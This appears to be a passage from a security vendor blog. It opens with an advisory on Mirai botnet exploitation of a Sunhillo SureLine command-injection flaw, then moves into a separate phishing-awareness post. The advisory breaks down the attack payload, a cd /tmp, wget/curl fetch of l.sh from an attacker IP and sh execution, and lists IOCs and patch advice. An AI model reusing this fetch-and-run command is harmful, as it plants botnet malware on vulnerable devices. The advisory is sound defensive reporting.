The POST request has a malicious payload designed to exploit the vulnerability. It attempts to download a script "l.sh" from the remote server "194.180.48.100" to the "/tmp" directory on the target system using both "wget" and "curl." After downloading the script, it is executed using the "sh" command. Let’s breakdown the payload:

  • cd /tmp: Changes the current directory to "/tmp."
  • wget httpx://194.180.48.100/l.sh: Downloads the "l.sh" script from the specified URL.
  • curl -O httpx://194.180.48.100/l.sh: Downloads the "l.sh" script using "curl" with the "-O" option.
  • sh l.sh: Executes the downloaded "l.sh" script using the "sh" command.

Looking up the attacker-controlled server on VirusTotal, we see that the URL (Figure 1) and the script l.sh (Figure 2) are marked as malicious and are used by the Mirai botnet.

Figure 1

Figure 2

Figure 2

Mirai is a malware that created a big botnet of networked devices running Linux making them remotely controlled bots that can be used for large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS 15931: Sunhillo SureLine Command Injection

Threat Graph


Recent indications of increased signature hits point to an ongoing exploitation of this vulnerability in real-world scenarios. It appears that the Mirai botnet has expanded its scope to target vulnerable Sunhillo devices for the distribution of malware.

IOCs

  • SHA256: c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63 (l.sh)
  • Known Malicious C2: 194.180.48.100

Remediation Recommendations

To mitigate this vulnerability, it is strongly recommended to update Sunhillo SureLine devices to at least version 8.7.0.1.1. This update will address the security issue and improve the overall system’s resilience against such exploits.

Relevant Links

https://nvd.nist.gov/vuln/detail/CVE-2021-36380
https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/

Cybersecurity Awareness Month: Recognizing Phishing Attacks

/0 Comments/in , /by

October brings to mind three things: busting out the fall wardrobe, Halloween and, last but not least, cybersecurity awareness. If you read that list and thought to yourself, “Cybersecurity awareness? Not me!” then congratulations, you are our target audience.

In conjunction with the U.S. Cybersecurity and Infrastructure Agency (CISA) and the National Cybersecurity Alliance (NCA), SonicWall is participating in Cybersecurity Awareness Month this October to spread awareness about key issues in cybersecurity.

In our last blog, we mentioned that while password hygiene and multifactor authentication are both crucial, they can be easily foiled by a successful phishing attack. Today, we’re going to cover the basics of recognizing phishing attempts and what to do if you spot one.

Phishing Frenzy

Phishing attacks are not a new phenomenon. They’ve been a favorite attack vectors of cybercriminals across the board for many years now. But every time cybersecurity tools get better at spotting them, they get better at hiding. That’s why knowing how to recognize phishing is more important than ever.

How to Spot a Phishing Attack

Hackers or scammers will often use emails or text messages to try and steal your login credentials, account numbers or even Social Security numbers. Once they have the information they want in hand, they can perform a multitude of nefarious deeds, such as accessing your email account or stealing money from your bank account. They may even be using you to access an organization you’re a part of, such as your workplace.

These cybercriminals are constantly updating their tactics to keep up with the latest news and trends, but they often exhibit some common characteristics that you can spot to avoid being their next victim.

These include the types of email or message phishers like to use. They’ll often be posing as your bank or a credit card company. It could be an email that looks like it’s from a coworker or your boss.

Oftentimes, these messages will say something like:

  • There’s been some suspicious activity with your account, and they need you to log in to verify.
  • You’ve missed an important payment or deadline and direct you to a link to rectify the situation.
  • You need to confirm some sort of personal information, like your Social Security number.
  • You must download an attachment or document, or login to your work email.

While some phishing emails have definite “tells,” the messages can also look quite convincing. They may look similar to emails you’ve received from real organizations in the past, even going so far as to use the official logo of the company in the header or a clone of it.

Some telltale signs of a phishing email include:

  • The message uses a generic greeting such as “Hello user” or “Hi dear.”
  • The message asks you to click on a link to update your payment details.

While real companies will sometimes communicate through email or text message, they will never email or text you asking for important financial or personal information.

What to Do When You Spot A Phishing Attack

If you receive a suspicious email or message that matches some of the criteria above, always leave the email or message and go to the company’s website directly to contact someone. (The links and numbers in phishing messages will always direct you back to the phisher themselves.)

By going to the company’s official website or calling their official phone number, you can ensure that you’re speaking with someone at the actual company and not a cybercriminal.

If you receive a suspicious email at work, you should report it to IT so they can be aware someone may be trying to infiltrate the company. If you received it in your personal email, you can forward the email to the Anti-Phishing Working Group at reportphishing@apwg.org. Suspected phishing via text message can be forwarded to SPAM (7726).

Protecting Yourself from Phishing

While phishing attempts can be scary, there are a number of tools and strategies that can help protect you and your organization. You can:

Taking just a few steps towards protecting your important information and accounts could be the difference in staying protected or becoming a victim of phishing.

Further Learning

While we’ve covered the basics, the more you learn about phishing, the better protected you’ll be. You can watch our School of Phish webinar series on-demand and learn about the different ways our cybersecurity experts handle real-world phishing incidents.

If you feel like you’re prepared to spot some phishing attacks, you can test your mettle against our phishing quiz, which will gauge your ability to identify phishing emails.